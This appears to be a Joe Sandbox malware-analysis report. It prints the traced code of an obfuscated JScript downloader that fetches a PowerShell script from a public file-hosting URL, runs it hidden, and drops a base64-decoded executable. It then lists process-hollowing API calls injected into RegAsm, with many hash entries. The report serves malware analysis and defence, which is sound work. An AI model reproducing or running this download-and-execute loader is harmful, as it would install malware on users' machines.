    • _j("https://files.catbox.moe/jqxrkk.ps1","C:\Temp\dddddd.ps1") ➔ true
    _h.Open ( "GET", _k, false );
        • Open("GET","https://files.catbox.moe/jqxrkk.ps1",false) ➔ undefined
    _h.Send ( );
        • Send() ➔ undefined
    if ( _h.Status !== _d )
    {
        _m ( "Download failed with status: " + _h.Status );
        return false;
    }
    try
    {
        var _n = _g.CreateTextFile ( _l, true );
            • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
                                                                                                                                    _n.Write ( _h.ResponseText );
                                                                                                                                    • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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") ➔ undefined
                                                                                                                                    26
                                                                                                                                    _n.Close ( );
                                                                                                                                    • Close() ➔ undefined
                                                                                                                                    27
                                                                                                                                    return true;
                                                                                                                                      28
                                                                                                                                      }
                                                                                                                                        29
                                                                                                                                        catch ( _o )
                                                                                                                                          30
                                                                                                                                          {
                                                                                                                                            31
                                                                                                                                            _m ( "Error writing downloaded script: " + _o.message );
                                                                                                                                              32
                                                                                                                                              return false;
                                                                                                                                                33
                                                                                                                                                }
                                                                                                                                                  34
                                                                                                                                                  }
                                                                                                                                                    35
                                                                                                                                                    function _m(_p) {
                                                                                                                                                      36
                                                                                                                                                      WScript.Echo ( _p );
                                                                                                                                                        37
                                                                                                                                                        }
                                                                                                                                                          38
                                                                                                                                                          function _q(_r) {
                                                                                                                                                          • _q("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                          39
                                                                                                                                                          try
                                                                                                                                                            40
                                                                                                                                                            {
                                                                                                                                                              41
                                                                                                                                                              var _s = _e + "\"" + _r + "\"";
                                                                                                                                                                42
                                                                                                                                                                _f.Run ( _s, 0, true );
                                                                                                                                                                • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
                                                                                                                                                                43
                                                                                                                                                                }
                                                                                                                                                                  44
                                                                                                                                                                  catch ( _t )
                                                                                                                                                                    45
                                                                                                                                                                    {
                                                                                                                                                                      46
                                                                                                                                                                      _m ( "Failed to execute PowerShell script: " + _t.message );
                                                                                                                                                                        47
                                                                                                                                                                        }
                                                                                                                                                                          48
                                                                                                                                                                          }
                                                                                                                                                                            49
                                                                                                                                                                            function _u() {
                                                                                                                                                                            • _u() ➔ undefined
                                                                                                                                                                            50
                                                                                                                                                                            _i ( );
                                                                                                                                                                            • _i() ➔ undefined
                                                                                                                                                                            51
                                                                                                                                                                            if ( ! _j ( _a, _b ) )
                                                                                                                                                                            • _j("https://files.catbox.moe/jqxrkk.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                                                                            52
                                                                                                                                                                            {
                                                                                                                                                                              53
                                                                                                                                                                              _m ( "Exiting script due to download failure." );
                                                                                                                                                                                54
                                                                                                                                                                                WScript.Quit ( );
                                                                                                                                                                                  55
                                                                                                                                                                                  }
                                                                                                                                                                                    56
                                                                                                                                                                                    _q ( _b );
                                                                                                                                                                                    • _q("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                    57
                                                                                                                                                                                    }
                                                                                                                                                                                      58
                                                                                                                                                                                      _u ( );
                                                                                                                                                                                      • _u() ➔ undefined
                                                                                                                                                                                      Reset < >
Memory Dump Source
• Source File: 00000001.00000002.1831570113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
Memory Dump Source
• Source File: 00000001.00000002.1831203998.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd

Execution Graph

Execution Coverage: 26.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 123
Total number of Limit Nodes: 1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd

Control-flow Graph (graph image not reproduced): function e5580c-e56bec, calls ReadProcessMemory

APIs
• ReadProcessMemory.KERNELBASE(00000004,?,00E56AFB,?,?), ref: 00E56BDC
Similarity
• API ID: MemoryProcessRead

Control-flow Graph (graph image not reproduced): function e558d4-e56aa6, calls Wow64SetThreadContext

APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
Similarity
• API ID: ContextThreadWow64

Control-flow Graph (graph image not reproduced): function e5575c-e575d8, calls WriteProcessMemory and Wow64SetThreadContext

APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
Similarity
• API ID: ContextThreadWow64

Control-flow Graph (graph image not reproduced): function e557cc-e56817, calls CreateProcessA

APIs
• CreateProcessA.KERNELBASE(?,?,03C9358C,03C93590,00E56316,?,?,?,?,?), ref: 00E566A3
Similarity
• API ID: CreateProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                        • Opcode ID: 2128a656e5cac4ea67fb4b58a301158a17f7443f265d83bb2d290a85c094eecc
                                                                                                                                                                                        • Instruction ID: 27b382eca2bd8e8c96f138a5713ee162ada436102b1de154a270e3e5012d51e5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2128a656e5cac4ea67fb4b58a301158a17f7443f265d83bb2d290a85c094eecc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CD12770D002199FDF24CFA8C881BEDBBB1FB49304F1095A9D819B7290DB749A89CF90

Control-flow Graph
• Function range: e56374-e56817, CreateProcessA call site in block e565ca-e566b6
APIs
• CreateProcessA.KERNELBASE(?,?,03C9358C,03C93590,00E56316,?,?,?,?,?), ref: 00E566A3
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: afeb549e26ae07b2ab31eb905bc8e8c1c5fa77028ec31f428ab5e86d7b3dd384
• Instruction ID: 82cd39922fdba96dccfdf23d98e4923979a9248468e45e2b30b8ad4ba8aed0b3
• Opcode Fuzzy Hash: afeb549e26ae07b2ab31eb905bc8e8c1c5fa77028ec31f428ab5e86d7b3dd384
• Instruction Fuzzy Hash: ECD11770D002199FDF24CFA8C881BEDBBB1FB49305F1095A9D919B7290DB749A89CF94

Control-flow Graph
• Function range: e55830-e575d8, WriteProcessMemory call site in block e57526-e57585
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00E57575
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: be0822cbd925209f94298c7b229a278e744ddfeb87053e116278015095622b97
• Instruction ID: e94f9cfd8ad92f11cbca189ce9bb7b707b4245ae505ee295869ae4e6ecc17886
• Opcode Fuzzy Hash: be0822cbd925209f94298c7b229a278e744ddfeb87053e116278015095622b97
• Instruction Fuzzy Hash: 544189B5D042589FCB00CFA9D984AEEFBF1BF49314F24A42AE818BB250D375A945CF54

Control-flow Graph
• Function range: e5583c-e575d8, WriteProcessMemory call site in block e57526-e57585
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00E57575
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 589f1fb428807a9b4da0887dee162de089ae00c603d052e786ea8c5096be0a4b
• Instruction ID: 54eb1c796f2075d3d05f41f1aab9a3d80388197a0ff5df284cc79e38dc847dad
• Opcode Fuzzy Hash: 589f1fb428807a9b4da0887dee162de089ae00c603d052e786ea8c5096be0a4b
• Instruction Fuzzy Hash: 9E4199B5D042589FCF00CFA9D984AEEFBF1BB49310F24A42AE818BB210D375A944CF54

Control-flow Graph
• Function range: e57499-e575d8, WriteProcessMemory call site in block e57526-e57585
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 00E57575
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: a088bc71a96ebdb34e4ceffaf6ab63a1d85a31068b2759a883226d832da7e620
• Instruction ID: 7321c296e6efd6e280f1f14885a7794dd59821110867648fbcb13ba2186c7cb2
• Opcode Fuzzy Hash: a088bc71a96ebdb34e4ceffaf6ab63a1d85a31068b2759a883226d832da7e620
• Instruction Fuzzy Hash: 764199B5D002589FCB00CFA9D984AEEFBF1BF49310F24942AE818BB210D375A955CF54

Control-flow Graph
• Function entry e56d28, blocks e56d0f-e56e37, VirtualAllocEx call site in block e56d78-e56dec
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E56DDC
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 33147c7f257d31494cd9b738f82e16da3a3432f8260bedd32d3011511a17be22
• Instruction ID: 8689ccc02b07869e884259d6a25030f8dad157685e19f8278db2ad184d19fd6d
• Opcode Fuzzy Hash: 33147c7f257d31494cd9b738f82e16da3a3432f8260bedd32d3011511a17be22
• Instruction Fuzzy Hash: E34189B9D052589FCF10CFA9D984ADEFBB1BB59310F24A41AE818B7310D375A905CF54

Control-flow Graph
• Function range: e55824-e56e37, VirtualAllocEx call site in block e55824-e56dec
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00E56DDC
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 5bda928ff568e669e7e001f4d081627d3e82b71c905d1a351e93d9f5daf14f86
• Instruction ID: 815c811775cb9bd1d7d51dc7627e0499392c54c676633d5b41acf5f016010cd3
• Opcode Fuzzy Hash: 5bda928ff568e669e7e001f4d081627d3e82b71c905d1a351e93d9f5daf14f86
• Instruction Fuzzy Hash: 654186B9D002589FCF10CFA9D984A9EFBF1AB59310F20A42AE818B7310D375A905CF64

Control-flow Graph
• Function range: e557d8-e56aa6, Wow64SetThreadContext call site in block e56a13-e56a59
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 83ab9ecc218eed4c2a146704d9191712720e91e02c15c6624e72bd3803124186
• Instruction ID: 3cb084845810fcec6c7d072808d65456d68927cca7a260e0c1c809128b42dd14
• Opcode Fuzzy Hash: 83ab9ecc218eed4c2a146704d9191712720e91e02c15c6624e72bd3803124186
• Instruction Fuzzy Hash: 1341BBB5D002589FCB10CFAAD884ADEFBF1BB49314F20942AE818B7251D378A949CF54

Control-flow Graph

APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 3d420a03373de83dbcec03d2ea7a85bec91281e3be168cd6dc7e5b901f79fea1
• Instruction ID: 597e6285fa8a9f3e1fef9108b2247f4423223ad7c24502755cf2d00e32131ae2
• Opcode Fuzzy Hash: 3d420a03373de83dbcec03d2ea7a85bec91281e3be168cd6dc7e5b901f79fea1
• Instruction Fuzzy Hash: 6A41A9B4D002589FCB10CFAAD984ADEFBF0BB49310F20942AE818B7351D378A949CF54

Control-flow Graph

APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00E56A49
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: a7467fe6d7ce190d63e4622a0ce7fba613411472d550f207d856c334f5c90f12
• Instruction ID: 42046ced5f1604c29e003dc186a124b50b2327273b2d87da7c6c27c53fc635b9
• Opcode Fuzzy Hash: a7467fe6d7ce190d63e4622a0ce7fba613411472d550f207d856c334f5c90f12
• Instruction Fuzzy Hash: A141A9B4D002589FCB10CFAAD984ADEFBF1BB49314F20942AE818B7211D378A949CF54
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E51C7F
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 2bc176af1f9bfcb0a1d296a6f54fbfb93670711fa49ded07b24b17b0dd9f992f
• Instruction ID: 0e5f1e29e5858c8a49da98cf367c1ad29342d5c8f9f64c1e564e8532e6d1c766
• Opcode Fuzzy Hash: 2bc176af1f9bfcb0a1d296a6f54fbfb93670711fa49ded07b24b17b0dd9f992f
• Instruction Fuzzy Hash: C831B8B9D002589FCB14CFA9D980ADEFBF1BB19310F24A06AE818B7310C375A944CF64
APIs
• ResumeThread.KERNELBASE(00000000), ref: 00E578BD
Memory Dump Source
• Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e50000_x.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: cd32ae97108b51a8d15fa0e30b1e30b7e4c94dcdc205a3280bc073f4d2569ca0
• Instruction ID: 0c1844e78c2049d78141bb87a51ab6de544459171d45c2bcf27630ce26da373e
• Opcode Fuzzy Hash: cd32ae97108b51a8d15fa0e30b1e30b7e4c94dcdc205a3280bc073f4d2569ca0
• Instruction Fuzzy Hash: 7231CBB4D052189FCB14CFA9E484A9EFBF4FB48310F20946AE818B7310D375A904CFA4

Execution Graph

Execution Coverage: 14.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 14.3%
Total number of Nodes: 28
Total number of Limit Nodes: 3

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6369bbe961a5091007eb2599632c5a8e9b2d65c86a76da7270be5beb3c6daf9c
• Instruction ID: ed3afd5d805b3ac47d6a19c5f42e13248ecb09aca88217938c41e77d11fa31bb
• Opcode Fuzzy Hash: 6369bbe961a5091007eb2599632c5a8e9b2d65c86a76da7270be5beb3c6daf9c
• Instruction Fuzzy Hash: DB223A74E002188FDB14DFA9C994B9EFBB2BF88314F1095AAD409AB395DB349D85CF50

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1621efe5bfe3ea483d2b81a1d855bf12de8946140ffa7222d6671134d7b92493
• Instruction ID: 3f29349d2730c4824d07b812ed6b5769739d5986e4afa2e09277063cbfa62495
• Opcode Fuzzy Hash: 1621efe5bfe3ea483d2b81a1d855bf12de8946140ffa7222d6671134d7b92493
• Instruction Fuzzy Hash: B0C1A178E10218CFDB54DFA5D994B9DBBB2BF88304F2480A9E809A7394DB355E85CF50

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5d0011c800a43b1e6ffa53996baca7f54dfed7925a6ec6a2f3429aa432cd6c0
• Instruction ID: 5a46b5a821e19b519a3e95eeff93a78106cdfc6a457d98080157583a867c6392
• Opcode Fuzzy Hash: c5d0011c800a43b1e6ffa53996baca7f54dfed7925a6ec6a2f3429aa432cd6c0
• Instruction Fuzzy Hash: 9BA11474D00209CFEB14DFA9C598B9DBBB1FF88304F209269E419B7291DB749985CF54
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 007abe6ebc51302ba2054455cc8685c936a5abbf8a227775106f35f8e08d846f
                                                                                                                                                                                        • Instruction ID: e43974989d9b44ba6b75974ba8ffe863b1222257d836f9ec01957d6fb10fa5d8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 007abe6ebc51302ba2054455cc8685c936a5abbf8a227775106f35f8e08d846f
                                                                                                                                                                                        • Instruction Fuzzy Hash: E791F274D00208CFEB14DFA8C598BADBBB1FF49304F249259E409BB291DB749985CF54

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 1558 2aac76c 1559 2aac82b-2aac83c 1558->1559 1560 2aac83e 1559->1560 1561 2aac843-2aac84c 1559->1561 1560->1561 1563 2aac852-2aac865 1561->1563 1564 2aac623-2aac648 1561->1564 1567 2aac86c-2aac887 1563->1567 1568 2aac867 1563->1568 1565 2aac64a 1564->1565 1566 2aac64f-2aac686 1564->1566 1565->1566 1576 2aac688 1566->1576 1577 2aac68d-2aac6bf 1566->1577 1569 2aac889 1567->1569 1570 2aac88e-2aac8a2 1567->1570 1568->1567 1569->1570 1574 2aac8a9-2aac8bf LdrInitializeThunk 1570->1574 1575 2aac8a4 1570->1575 1578 2aac8c1-2aac9bf 1574->1578 1575->1574 1576->1577 1583 2aac723-2aac736 1577->1583 1584 2aac6c1-2aac6e6 1577->1584 1581 2aac9c1-2aac9c6 call 2aa5ca8 1578->1581 1582 2aac9c7-2aac9d1 1578->1582 1581->1582 1586 2aac738 1583->1586 1587 2aac73d-2aac762 1583->1587 1588 2aac6e8 1584->1588 1589 2aac6ed-2aac71b 1584->1589 1586->1587 1593 2aac771-2aac7a9 1587->1593 1594 2aac764-2aac765 1587->1594 1588->1589 1589->1583 1595 2aac7ab 1593->1595 1596 2aac7b0-2aac811 call 2aac168 1593->1596 1594->1563 1595->1596 1602 2aac818-2aac82a 1596->1602 1603 2aac813 1596->1603 1602->1559 1603->1602
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(00000000), ref: 02AAC8AE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956707735.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2aa0000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 325e1472d9510aa24de0df93837c23c824159044669d0daec2caf718e0c598f4
                                                                                                                                                                                        • Instruction ID: 3c0d7a6d80d34d74a842e735879b34e73a51cee823f480e06304b7f735401341
                                                                                                                                                                                        • Opcode Fuzzy Hash: 325e1472d9510aa24de0df93837c23c824159044669d0daec2caf718e0c598f4
                                                                                                                                                                                        • Instruction Fuzzy Hash: F2117C75E011099FEB04DFE8D594AADBBB6FF8C314F549166E804A7245DB30E982CB60
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956442926.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_28dd000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 6f2ae8c62bb2ba3225acb4abe6a5c7ca3ce6a7d21657a1a3988e624bbfba7441
                                                                                                                                                                                        • Instruction ID: 3953c7f519708dbe4398145f7e57ac0381614eeb9d4dfa790c4a372950f23c02
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2ae8c62bb2ba3225acb4abe6a5c7ca3ce6a7d21657a1a3988e624bbfba7441
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F2122BE504204DFDB14DF14D9C0B26BBA5FBC4318F64C96DD90A8B242C73AD84BCA62
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000005.00000002.2956442926.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_28dd000_RegAsm.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: fb7053d058881120f74de3fac57d62dd1b459d3ea73647d995286087848b6aa3
                                                                                                                                                                                        • Instruction ID: a6641d00e11228d55449b41f75835d5e9e6503bfc3025f321f1510261d10a3d0
                                                                                                                                                                                        • Opcode Fuzzy Hash: fb7053d058881120f74de3fac57d62dd1b459d3ea73647d995286087848b6aa3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 58214D751093C09FCB03CB24D990B11BF71AB46214F29C5DBD8898F6A7C33A984ACB62